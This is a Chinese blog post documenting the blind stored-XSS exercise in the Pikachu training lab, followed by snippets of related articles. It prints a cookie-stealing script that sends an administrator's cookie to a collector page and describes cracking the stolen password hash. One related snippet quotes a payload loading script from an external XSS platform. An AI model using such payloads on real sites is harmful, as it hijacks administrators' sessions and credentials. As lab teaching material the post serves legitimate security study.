Pikachu靶场:XSS盲打

最新推荐文章于 2025-04-06 11:08:35 发布
最新推荐文章于 2025-04-06 11:08:35 发布
阅读量2.3k 收藏 5
点赞数 1
分类专栏: Pikachu靶场实战 文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/witwitwiter/article/details/115798058
版权

Pikachu靶场:XSS盲打

实验环境以及工具

Firefox浏览器、Burp Suite、Pikachu靶场

实验原理

●xss盲打也是属于存储型XSS类型

盲打的意思是无法直接在前端看到反馈效果。

xss盲打类型交互的数据会被存在在数据库里面,永久性存储,一般出现在留言板,问卷调查等页面。

形成XSS漏洞的主要原因是程序对输入和输出的控制不够严格,导致“精心构造”的脚本输入后,在输到前端时被浏览器当作有效代码解析执行从而产生危害。存储型XSS漏洞跟反射型形成的原因一样,不同的是存储型XSS下攻击者可以将脚本注入到后台存储起来,构成更加持久的危害,因此存储型XSS也称“永久型”XSS

XSS盲打测试流程

1.在目标站点上找到输入点,比如查询接口,留言板等;

2.输入一组“特殊字符+唯一识别字符”,点击提交后,等待目标上线触发;

3.在XSS后台中查看结果

具体操作

1.在目标站点上找到输入点,比如留言板,问卷调查等

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-glgE5c9N-1618649901720)(C:\Users\freedom\AppData\Roaming\Typora\typora-user-images\image-20210416171244549.png)]

2.构造payload进行注入

<script>document.location = 'http://127.0.0.1/pikachu/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-zBXz3p2Y-1618649901723)(C:\Users\freedom\AppData\Roaming\Typora\typora-user-images\image-20210416172234128.png)]

3.后台等待对方登录

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-1xfS135Y-1618649901724)(C:\Users\freedom\AppData\Roaming\Typora\typora-user-images\image-20210416182751724.png)]

利用hash-identifier判断加密类型

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-yWFBD5iD-1618649901725)(C:\Users\freedom\AppData\Roaming\Typora\typora-user-images\image-20210416191129619.png)]

利用在线解密进行解密

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-yN7f2TiC-1618649901727)(C:\Users\freedom\AppData\Roaming\Typora\typora-user-images\image-20210416191217118.png)]

总结

XSS盲打的攻击目标是后台管理员,在前端利用输入接口进行攻击,输入的js代码被存储到了数据库中,在管理员登录的时候被触发。盗取管理员cookie后即刻进行管理员密码破解。

某次日常xss盲打
召唤大白的博客
03-09 364
今天接到个渗透测试的活,基本上就是静态站,本来也不报啥希望了,扫了一圈整个站就一个留言功能,根据经验一般留言就是在标签里,所以右键查看下元素,确定留言内容确实在里面,随手一个xss盲打未拦截,成功提交留言。 盲打使用的xss平台的默认模块Payload: ccc”</tExtArEa><sCRiPt sRC=https://xss8.cc/CnQ6></sCrIpT><textarea> 快下班时意外收到了弹回来的cookie,并且定位到了该站后台地址如下图,
Pikachu靶场XSS漏洞详解
Nai_zui_jiang的博客
08-22 1193
跨站脚本攻击是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览页面时,攻击者插入在页面的Script代码会被解析执行,从而达到恶意攻击的目。
登录 pikachu XSS后台或者登pikachu出现Warning: mysqli_connect(): (HY000/1049): Unknown database ‘pkxss‘ in....
2201_75632204的博客
04-03 2137
如果访问pikachu页面也出现了Warning: mysqli_connect()。方法同上访问install.php重新安装pikachu数据库即可。还有配置文件pikachu\inc\config.inc.php同上只是DBNAME是pikachu 不一样罢了。查看pikachu\pkxss\inc 目录下的配置文件 config.inc.php。最后试着重新进入XSS后台,问题得以解决!查看与刚才的写的密码是否对的上。数据库重启,并且连接成功后。
【网络安全】靶机pikachuxss注入与代码分析
最新发布
小陈的博客
04-06 1041
本文使用靶机pikachu,来练习一下工具XSStrike常用命令。
Pikachu靶场之(XSS盲打)
qq_45754781的博客
06-07 2705
XSS入门之PikachuXSS盲打
XSS盲打
Naive_boy00的博客
10-15 2688
XSS的查找:绕过过滤机制,利用服务端错误的编码方式例:url:http//www.foo.com/xss.php?id=1HTML标签之间<div>[输出]</div> //xsspayload:<script>alert(1)</script>标签之间无法执行脚本,要先闭合掉对应的标签。此类标签有:<title></title> <textarea></textarea> <xmp></xmp>
pikachu靶场练习之XSS盲打、过滤。。)
qq_45795768的博客
10-31 452
标签,但该标签可以被各种编码,后台不一定会过滤,当浏览器对该编码进行识别时,会翻译成正常的标签,从而执行.2、拼凑: <scri<script>pt>alert(111)</scri
pikachu靶场第十关——XSS(跨站脚本)之xss盲打(附代码审计)
yzasts的博客
03-21 768
和之前的存储型xss不同,这里提交的数据并不会返回到页面中,而是提交到后台,在无法登录后台的情况下,就只能盲打。不过这里为了学习漏洞,我们直接登录后台,用户名:admin,密码:123456。这里有两个输入,一个content,一个name。
pikachu靶场-XSS
braty_的博客
02-21 1690
这里是用get请求做了一个长度的限制,我们使用hackbar来进行传参,页面会弹出一个xss,证明存在xss漏洞,我们顺便讲一下 beef-xss工具。形成XSS漏洞的主要原因是程序对输入和输出没有做合适的处理,导致“精心构造”的字符输出在前端时被浏览器当作有效代码解析执行从而产生危害。在输入框随便输入 11 ,F12 可以看见,11 被添加在了 标签里面(html的超链接标签)XSS漏洞一直被评估为web漏洞中危害较大的漏洞,在OWASP TOP10的排名中一直属于前三的江湖地位。
XSS漏洞:pikachu靶场中的XSS通关
qq_68163788的博客
05-25 2258
pikachu靶场中的XSS通关是一种漏洞攻击技术,通过在输入框中注入恶意脚本代码来实现攻击。攻击者可以利用XSS漏洞窃取用户的cookie信息、重定向用户到恶意网站或者篡改网页内容等。在pikachu靶场中,攻击者可以通过输入恶意代码实现跨站脚本攻击,从而获取敏感信息或者控制网页行为。要防范XSS漏洞,网站开发者应该对用户输入进行严格过滤和验证,避免恶意代码的注入。
写一个python脚本检测pikachu靶场xss盲打
06-03
好的,下面是一个简单的 Python 脚本,用于检测 pikachu 靶场XSS 盲打漏洞。 ```python import requests # 构造请求 url = "http://your-pikachu-url.com/vulnerabilities/xss_s/" payload = "<script>alert('...
pikachu靶场xss盲打
12-27
### Pikachu靶场 XSS盲打实验指导 #### 实验环境搭建 为了进行XSS盲打测试,需先设置好Pikachu靶场的运行环境。通常情况下,该靶场部署于本地服务器上,访问路径应为`localhost:8086/pikachu-master/vul/xss/...
pikachuXSS分类、场景(钓鱼、盲打、过滤)
m0_59856804的博客
12-20 1566
Xss pikachu 保存型xss 反射型、DOM型 xss钓鱼 Xss盲打 XSS过滤 XSS之htmlspecialchars Htmlspecialchars()函数 XSS之href输出 防范措施: 21
关于xss盲打关于xss盲打
u012614598的专栏
11-21 1090
关于xss盲打关于xss盲打      又到了各种年终总结的时候了,先祝各位看官“圣诞快乐”。我记得有朋友问我在2012年里有没有“猥琐流”比较出彩的东西时,我给的答案是“xss盲打”!   关于“盲打”这个词语的出现,最早应该是在wooyun里id为“胯下有杀气”的马甲提出的。最早的一个wooyun案列是2012年7月提交的《WooYun-2012-09547》 ,由此xss盲打火了起来,
什么是xss盲打
weixin_34334744的博客
10-26 145
什么是xss盲打?         盲打仅仅是一种惯称的说法,就是不知道后台不知道有没有xss存在的情况下,不顾一切的输入xss代码在留言啊,feedback啊之类的地方,尽可能多的尝试xss的语句与语句的存在方式,就叫盲打。        “xss盲打”是指在攻击者对数据提交后展现的后台未知的情况下,站点採用了攻击者插入了带真实攻击功能的xss攻击代码(一般是使用script标签引入...
pikachu漏洞练习第二章节xss盲打练习收获
kaka6764的博客
08-28 228
在一些输入内容的文本框使用环境下,文本输入后被保存在后端。只有后端才能看到前端输入的内容,从前端无法判断是否存在xss。在未知后端代码的情况下,作为攻击者直接往里使用xss代码可能能利用上后端的xss漏洞。
pikachu靶场--XSS--盲打/过滤/htmlspecialchars/href输出/js输出【2.6】~【2.10】
lmei1228的博客
06-08 324
alert('xss')
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值